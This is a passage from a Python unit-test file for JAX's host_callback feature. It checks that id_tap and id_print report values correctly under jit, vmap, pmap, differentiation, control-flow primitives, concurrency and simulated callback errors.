( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00 9.00 )""")
def test_tap_eval_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00 [] )""", testing_stream.output)
def test_tap_jit_simple(self):
jit_fun1 = jax.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, jax.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
jax.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
jax.xla_computation(func)(1).as_hlo_text())
self.assertEqual(2, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = jax.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info(f"{self._testMethodName}: has devices {local_devices()}")
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in local_devices():
self.assertEqual(112, jax.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info(f"{self._testMethodName}: found output {testing_stream.output}")
self.assertEqual(
len(local_devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(
len(local_devices()), len(re.findall(r"112", testing_stream.output)))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = jax.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU, GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info(f"Starting do_tap {idx}. Sleeping 1sec ...")
time.sleep(0.3)
logging.info(f"Finish do_tap {idx}")
def do_tap(idx):
jax.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap. Here we disable also
# on TPU, because the barrier_wait runs on all devices, including on the CPU
# where it would run into concurrency problems.
@skip("Concurrency not supported")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
jax.jit(long_run)(5.)
def try_barrier(idx):
logging.info(f"Starting test barrier {idx}")
hcb.barrier_wait()
logging.info(f"Finished test barrier {idx}")
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = jax.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{np.dtype(dtype).name}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_dtypes(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"host_callback not implemented for {dtype}.")
if dtype == np.bool_:
args = [np.random.choice(a=[True, False], size=shape)]
else:
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = jax.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res, check_dtypes=True)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
jax.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
jax.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += jax.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = jax.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: jax.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00 0.20 )
transforms: ['jvp'] what: y * 3
( 30.00 0.60 )""", testing_stream.output)
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
arg = jnp.float32(5.)
jaxpr = str(jax.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
treedef = tree_util.tree_structure(arg)
print(jaxpr)
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a:f32[]. let
b:f32[] = mul a 3.00
c:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=()
] b
_:* = mul c 2.00
d:f32[] = mul 1.00 2.00
_:* = broadcast_in_dim[broadcast_dimensions=() shape=()] 0.00
e:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=(('jvp',), ('transpose',))
] d
f:f32[] = mul e 3.00
in (f,) }}""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = jax.grad(jax.grad(func))
# making the Jaxpr does not print anything
_ = jax.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00""", testing_stream.output)
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = jax.grad(func)
print(jax.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00 15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00 0.00 )""", testing_stream.output)
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = jax.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00 2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00 False )""", testing_stream.output)
def test_tap_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (3. * x[0], x[1])
def f_jax_vjp(x):
res, pullback = jax.vjp(f_jax, x)
g, = pullback((np.ones(x[0].shape, dtype=x[0].dtype),
np.zeros(x[1].shape, dtype=dtypes.float0)))
return g
g = f_jax_vjp(x)
self.assertAllClose(np.array([3., 3.], dtype=np.float32), g[0])
self.assertEqual(dtypes.float0, g[1].dtype)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
def test_tap_higher_order_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (jnp.sin(x[0]), x[1])
def wrap_vjp(f, args, res_f_of_args):
# Given a function "f" and "args" return the f_vjp and args_vjp
def make_ct(res):
res_dtype = np.result_type(res)
if res_dtype == dtypes.float0:
return res
ct_dtype = core.primal_dtype_to_tangent_dtype(res_dtype)
return np.ones(np.shape(res), dtype=ct_dtype)
cts = tree_util.tree_map(make_ct, res_f_of_args)
def f_vjp(args, cts):
res, pullback = jax.vjp(f, *args)
return pullback(cts)
return (f_vjp, (args, cts))
res = f_jax(x)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 1st order
f_jax_vjp1, args_vjp1 = wrap_vjp(f_jax, (x,), res)
res_vjp1 = f_jax_vjp1(*args_vjp1)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
testing_stream.reset()
# 2nd order
f_jax_vjp2, args_vjp2 = wrap_vjp(f_jax_vjp1, args_vjp1, res_vjp1)
res_vjp2 = f_jax_vjp2(*args_vjp2)
# 3rd order
f_jax_vjp3, args_vjp3 = wrap_vjp(f_jax_vjp2, args_vjp2, res_vjp2)
_ = f_jax_vjp3(*args_vjp3)
def test_tap_vmap(self):
vmap_fun1 = jax.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = jax.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00 [4.00 5.00] )""", testing_stream.output)
def test_tap_vmap_vmap(self):
    # A 2D tensor with x[i, j] = i + j, using two nested vmaps
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return jax.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return jax.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(jax.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="before:x", output_stream=testing_stream)
x2 = lax.while_loop(
lambda x: x < 2, lambda x: hcb.id_print(
x + 1, where="body:x+1", output_stream=testing_stream), x1)
res = hcb.id_print(x2, where="after:x", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(
np.array([2, 2, 2, 3, 4]),
jax.jit(jax.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(
self, """
transforms: [('batch', {'batch_dims': (0,)})] where: before:x
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: after:x
[2 2 2 3 4]""", testing_stream.output)
def test_tap_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = jax.jit(jax.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
def test_tap_transforms(self):
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap = {jax.vmap(power3)(np.arange(3.))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [0. 1. 2.] [0. 1. 4.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
transforms: ['jvp'] what: x,x^2
( ( 3. 9. ) ( 0.1 0.6 ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
transforms: ['jvp', 'transpose'] what: x,x^2
( 0. 3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (None, 0)})] what: x,x^2
( 0. [2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_pmap(self):
if len(local_devices()) < 2:
raise SkipTest("test requires at least 2 devices")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y),
what="x,x^2",
output_stream=testing_stream,
tap_with_device=True)
return y * x
pmap_power3 = jax.pmap(power3, devices=local_devices())
xv = np.array([3, 4], dtype=np.int32)
res = pmap_power3(xv)
hcb.barrier_wait()
self.assertAllClose(xv * xv * xv, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: x,x^2
( 3 9 )
device: cpu:1 what: x,x^2
( 4 16 )""")
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = jax.pmap(
jax.vmap(partial(fun1, do_print=True)), devices=local_devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.vmap(partial(fun1, do_print=False)), devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
def test_tap_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=True))),
devices=local_devices())
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=False))),
devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
    # A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
